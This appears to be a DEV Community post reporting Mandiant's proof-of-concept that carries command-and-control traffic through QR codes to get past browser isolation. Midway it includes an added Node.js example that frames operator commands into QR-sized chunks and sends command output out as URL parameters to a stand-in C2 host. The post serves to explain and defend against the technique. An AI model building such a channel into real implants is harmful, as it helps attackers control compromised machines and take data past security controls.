DEV Community

geekgovind

Attackers Can Use QR Codes to Bypass Browser Isolation

Researchers have demonstrated a proof-of-concept attack that gets around remote, on-premises, and local browser isolation to carry command-and-control (C2) messages from an attacker-controlled server to a compromised device.

Security researchers have found a way to circumvent all three kinds of browser isolation, letting attackers push data to an implant on a compromised device by encoding it in QR codes.

Researchers from Mandiant presented a proof-of-concept (PoC) that circumvents remote, on-premises, and local browser isolation by replacing the usual HTTP-body-based C2 communication with machine-readable QR codes. The technique lets a command-and-control (C2) server deliver commands to the victim's device even though that device never sees the server's raw HTTP responses.

Companies typically deploy browser isolation to counter phishing, protect endpoints from browser-borne attacks, and defeat the standard C2 techniques attackers rely on. It runs the browser in a sandboxed environment, such as a cloud server or a virtual machine, and streams only the rendered output to the user's device.

With browser isolation in place, the remote browser handles everything from page rendering to JavaScript execution, and only a visual representation of the page is returned to the user's local browser.

Because attackers usually deliver commands to a compromised device in HTTP responses, browser isolation makes the standard approach to remote control difficult: the HTTP response the local browser receives contains only the pixel-streaming engine used to display the remote page's visible content, "and only a stream of pixels is sent to the local browser to visually render the webpage," Mandiant principal security consultant Thibault Van Geluwe de Berlaere wrote in a blog post. "This prevents typical HTTP-based C2 because the local device cannot decode the HTTP response."

Bypassing Browser Isolation With QR Codes
Mandiant researchers built a PoC that bypasses browser isolation using the Puppeteer JavaScript library to drive Google Chrome in headless mode, although any modern browser would work, Van Geluwe de Berlaere said.

Instead of carrying the C2 data in the HTTP body or headers, where the isolation layer would strip it before it reached the device, the C2 server returns a valid web page that visually displays a QR code. "The implant then uses a local headless browser ... to render the page, grabs a screenshot, and reads the QR code to retrieve the embedded data," Van Geluwe de Berlaere wrote.

"By taking advantage of machine-readable QR codes, an attacker can send data from the attacker-controlled server to a malicious implant even when the webpage is rendered in a remote browser."

In the attack, the implant on the compromised device requests a legitimate HTML page from the C2 server, with the command data encoded in a QR code displayed on that page. The request passes through the isolation layer, so it is the remote browser that actually fetches and renders the page.

The remote browser then hands the result to the pixel-streaming engine in the local browser, which displays the visual stream of the rendered page from the C2 server. The implant waits for the page to finish rendering, takes a screenshot of the local browser, decodes the QR code in the screenshot, and runs the recovered command on the compromised device.

To return the command output, the implant points the local browser at a new URL with the output encoded in a URL parameter. That request is passed to the remote browser, which forwards it to the C2 server, where the output is read back out of the parameter just as it would be in standard HTTP-based C2.


Challenges to Implementing the Bypass
The PoC shows that attackers can bypass browser isolation, but the researchers pointed out several drawbacks and practical limits.

First, it is not practical to use QR codes at their maximum data capacity (2,953 bytes in a 177 x 177 module code at error-correction level "L"), because "the visual stream of the web page rendered in the local browser was of insufficient quality to reliably read the QR code contents," Van Geluwe de Berlaere said. Instead, the researchers limited each QR code to a maximum of 2,189 bytes of data.

Second, each request takes about five seconds to display and scan a QR code, because of the processing needed to run Chrome in headless mode, the time the remote browser takes to start up, the page-rendering requirements, and the streaming of the visual content from the remote browser to the local one. "This introduces significant latency in the C2 channel," he wrote.
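As an added example (it is not the Mandiant PoC's code), here is Node.js message framing for the channel described above, covering both directions: the server splits a command across QR-sized frames of at most the 2,189 bytes the researchers found readable, the implant reassembles the decoded frame text, and the output travels back as base64url in a URL query parameter. Everything that touches pixels, drawing the QR code into the page, driving headless Chrome, screenshotting and scanning, is assumed to sit between the two halves and deliver the frame text unchanged; the 2,000-character URL budget, the `c2.example.invalid` endpoint and the frame layout are this example's own assumptions.

```javascript
// Added example, not code from the Mandiant PoC: message framing for a C2
// channel whose downstream carrier is a QR code rendered in the remote browser
// and whose upstream carrier is a URL query parameter. Drawing the QR image,
// driving the headless browser, screenshotting and scanning are assumed to sit
// between encodeCommandFrames() and decodeCommandFrames() and to deliver the
// frame text unchanged; they are not modelled here.
const QR_CAPACITY_BYTES = 2189;      // per-code payload the researchers found readable
const URL_MAX_CHARS = 2000;          // assumed budget per output request (proxy/URL limits)
const C2_BASE = 'https://c2.example.invalid/page';   // hypothetical C2 endpoint

function toB64Url(buf) {
  return buf.toString('base64').replace(/\+/g, '-').replace(/\//g, '_').replace(/=+$/, '');
}
function fromB64Url(s) {
  const padded = s + '='.repeat((4 - (s.length % 4)) % 4);
  return Buffer.from(padded.replace(/-/g, '+').replace(/_/g, '/'), 'base64');
}

// Split bytes into base64url chunks so that a chunk plus `overheadChars` of
// framing never exceeds `budgetChars`. Chunks are whole 3-byte groups so each
// one decodes on its own.
function chunkBase64(bytes, budgetChars, overheadChars) {
  const rawPerChunk = Math.floor((budgetChars - overheadChars) / 4) * 3;
  if (rawPerChunk <= 0) throw new Error('budget too small for any payload');
  const chunks = [];
  for (let off = 0; off < bytes.length; off += rawPerChunk) {
    chunks.push(toB64Url(bytes.subarray(off, off + rawPerChunk)));
  }
  return chunks.length ? chunks : [''];
}

// Server side: one frame per QR code, "<session>|<index>/<total>|<base64url>".
// A command larger than one code is spread over several pages, each fetched
// by a separate request through the isolation proxy.
function encodeCommandFrames(sessionId, command) {
  const overhead = sessionId.length + 16;   // two '|', one '/', up to 6 digits each
  const chunks = chunkBase64(Buffer.from(command, 'utf8'), QR_CAPACITY_BYTES, overhead);
  return chunks.map((c, i) => `${sessionId}|${i}/${chunks.length}|${c}`);
}

// Implant side: text recovered from the QR scan of each screenshot.
function parseFrame(text) {
  const m = /^([A-Za-z0-9]+)\|(\d+)\/(\d+)\|([A-Za-z0-9_-]*)$/.exec(text);
  if (!m) throw new Error('not a C2 frame');
  return { sessionId: m[1], index: Number(m[2]), total: Number(m[3]), data: m[4] };
}
// Reassemble parts in index order; refuse to return a truncated message.
function reassemble(parts) {
  const { sessionId, total } = parts[0];
  const ordered = new Array(total);
  for (const p of parts) {
    if (p.sessionId !== sessionId || p.total !== total) throw new Error('mixed sessions');
    if (p.index < 0 || p.index >= total || ordered[p.index] !== undefined) throw new Error('bad index');
    ordered[p.index] = p.data;
  }
  if (ordered.includes(undefined)) throw new Error('missing frame');
  return Buffer.concat(ordered.map(fromB64Url)).toString('utf8');
}
function decodeCommandFrames(frameTexts) {
  return reassemble(frameTexts.map(parseFrame));
}

// Return path: the implant steers its local browser to these URLs; the remote
// browser fetches them from the C2, which reads the output out of the query.
function encodeOutputUrls(sessionId, output) {
  const overhead = `${C2_BASE}?s=${sessionId}&i=000000&n=000000&o=`.length;
  const chunks = chunkBase64(Buffer.from(output, 'utf8'), URL_MAX_CHARS, overhead);
  return chunks.map((c, i) => `${C2_BASE}?s=${sessionId}&i=${i}&n=${chunks.length}&o=${c}`);
}
function decodeOutputUrls(urls) {
  return reassemble(urls.map((u) => {
    const q = new URL(u).searchParams;
    return { sessionId: q.get('s'), index: Number(q.get('i')), total: Number(q.get('n')), data: q.get('o') };
  }));
}

// Constructed round trip: a command too large for one code and a multi-kilobyte
// output, both crossing the channel intact.
function demoRoundTrip() {
  const sid = 'a1b2c3';
  const command = 'whoami; hostname; cat ' + 'x'.repeat(5000);
  const frames = encodeCommandFrames(sid, command);
  const output = 'corp\\alice\nWS-0042\n' + 'y'.repeat(3000);
  const urls = encodeOutputUrls(sid, output);
  return {
    frames: frames.length,
    maxFrameBytes: Math.max(...frames.map((f) => Buffer.byteLength(f))),
    commandOk: decodeCommandFrames(frames) === command,
    urls: urls.length,
    maxUrlChars: Math.max(...urls.map((u) => u.length)),
    outputOk: decodeOutputUrls(urls) === output,
  };
}
console.log(demoRoundTrip());
```

Run it with `node` to see the round-trip summary. A missing or out-of-order frame raises instead of silently truncating the command, which matters on a channel that costs several seconds per request and can drop a screenshot.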

Finally, the PoC does not account for other protections that browser-isolation products may layer on top, such as domain reputation, URL scanning, data loss prevention, and request heuristics, each of which an attacker would also need to overcome where it is enabled.

Despite the bypass, Mandiant still recommends browser isolation as a strong defence against client-side browser exploitation and phishing. But, as Van Geluwe de Berlaere said, it should be one component of "a well-rounded cyber defence posture" that also includes monitoring for anomalous network traffic and flagging browsers that are running in automation mode.
